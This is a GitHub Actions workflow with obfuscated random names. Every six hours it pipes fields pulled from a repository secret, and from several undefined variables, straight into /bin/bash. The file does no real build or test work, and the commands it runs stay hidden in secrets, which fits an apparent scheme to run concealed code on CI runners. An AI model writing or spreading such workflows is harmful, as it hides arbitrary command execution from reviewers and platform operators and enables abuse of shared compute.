name: jiangneihe3765
on:
  workflow_dispatch:
  schedule:
    - cron: '12 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jiangneihe3765
        env:
          htclz14398: ${{ secrets.htclz14398 }}
        run: |
          echo $htclz14398 | jq -r .p141 | /bin/bash
          echo $ty9944 | jq -r .gg6 | /bin/bash
          echo $ag78 | jq -r .xcn5516 | /bin/bash
          echo $z318 | jq -r .je41501 | /bin/bash
          echo $qqen0 | jq -r .t4 | /bin/bash
          echo $rhut38517 | jq -r .vecli25724 | /bin/bash
          echo $ub04 | jq -r .d39374 | /bin/bash
          echo $r05 | jq -r .qjhgr788 | /bin/bash
          echo $ow9120 | jq -r .ot10023 | /bin/bash

